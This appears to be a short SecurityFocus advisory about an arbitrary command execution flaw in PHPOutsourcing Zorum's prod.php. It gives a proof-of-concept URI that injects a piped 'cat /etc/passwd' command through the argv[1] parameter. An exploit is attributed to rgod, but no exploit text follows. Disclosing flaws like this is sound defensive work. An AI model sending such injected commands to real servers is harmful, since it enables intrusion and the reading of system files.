PHPOutsourcing Zorum Prod.PHP Arbitrary Command Execution Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd

rgod has supplied the following exploit:


 

Privacy Statement
Copyright 2010, SecurityFocus